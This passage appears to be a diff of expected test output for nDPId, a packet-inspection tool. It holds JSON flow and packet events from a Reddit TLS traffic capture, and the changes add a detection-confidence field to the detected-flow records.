 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686084,"flow_last_seen":1605291686084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291686084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605291686084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686084,"pkt":"qtsDr8lk5EKm5WPyht1gBTHMACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3Q4Bu5RtgHMAAAAAoAL9IHHJAAACBAWgBAIICql05hgAAAAAAQMDBw=="}
 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686084,"flow_last_seen":1605291686084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291686084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -81,9 +81,9 @@
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOmx9iS9BNgBAB++CSAAABAQgKqXTmJ8LXOMU="}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gDoxGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QABu3ytfXQZm0eGgBAB+1mYAAABAQgKqXTmJ8LXOMU="}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gBKPwACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3P4Bu+9x1NeMsOPUgBAB+4AOAAABAQgKqXTmJ8LXOMU="}
-00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBugO8IeJd6tioBJXgCN0AAACBAV4AQMDAwQCCArC1zjGqXTmBA=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBGVsk6UAYN+NoBJXgFfrAAACBAV4AQMDAwQCCArC1zjGqXTmAA=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdCGPwRcUBxWYioBJXgB9GAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="}
@@ -92,58 +92,58 @@
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gAj4aACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QgBuwHFZiJj8EXGgBAB+6MzAAABAQgKqXTmKMLXOMY="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdCnzgy8YZci18oBJXgKFLAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gCQMdACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QoBuxlyLXx84MvHgBAB+yU5AAABAQgKqXTmKMLXOMY="}
-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686101,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686101,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605291686102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686102,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdDA6Vo\/hs46MGoBJXgG5nAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1605291686102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686102,"pkt":"qtsDr8lk5EKm5WPyht1gBZ0wACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QwBu2zjowYOlaP5gBAB+\/JSAAABAQgKqXTmKsLXOMY="}
-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686103,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00974{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686035,"flow_last_seen":1605291686105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686105,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01249{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291686106,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}}
-00974{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":490,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01248{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., 